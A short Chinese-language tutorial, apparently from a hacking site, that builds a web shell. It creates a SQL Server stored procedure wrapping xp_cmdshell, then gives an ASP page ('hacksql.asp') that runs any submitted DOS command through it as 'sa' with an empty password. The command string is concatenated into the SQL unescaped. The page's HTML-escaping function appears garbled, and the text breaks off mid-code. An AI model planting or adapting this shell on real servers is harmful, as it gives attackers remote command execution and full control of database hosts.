1、首先在sql里面你能够访问的数据库里面建立存储过程，比如说：ddy
如下：
CREATE PROCEDURE ddy
@cmd varchar(50)
AS
exec master..xp_cmdshell @cmd
2、asp程序里如下：（hacksql.asp）
<%
cmd=trim(Request.Form("cmd"))
if cmd<>"" then
    work()
else
    show()
end if
function work()
    set conn=server.CreateObject("adodb.connection")
    set rs=server.CreateObject("adodb.recordset")
    conn.Open "xx","sa",""
    sql="exec ddy '"&cmd&"'"
    
    rs.Open sql,conn
    if not rs.EOF then
        do while not rs.eof
                                       Response.Write "<pre>"&htmlencode2(trim(rs(0)))&"</pre>"
            rs.MoveNext
        loop
    else
        Response.Write "no"
    end if
    if rs.State=1 then rs.close
    set rs=nothing
    conn.Close
    set conn=nothing
end function
function show()
%>
<form action=hacksql.asp method=post>
请输入DOS命令：<input type=text name=cmd>
<input type=submit value="ok">
</form>
<%
end function
function htmlencode2(str)'--------转换函数（为了显示时比较工整）
    dim result
    dim l
    if isnull(str) then
       htmlencode2=""
       exit function
    end if
    l=len(str)
    result=""
    dim i
    for i = 1 to l
        select case mid(str,i,1)
               case "<"
                    result=result+"<"
               case ">"
                    result=result+">"
               case chr(34)
                    result=result+"""
               case "&"
                    result=result+"&"
               case chr(13)
                    result=result+"<br>"
               case chr(9)
     &nb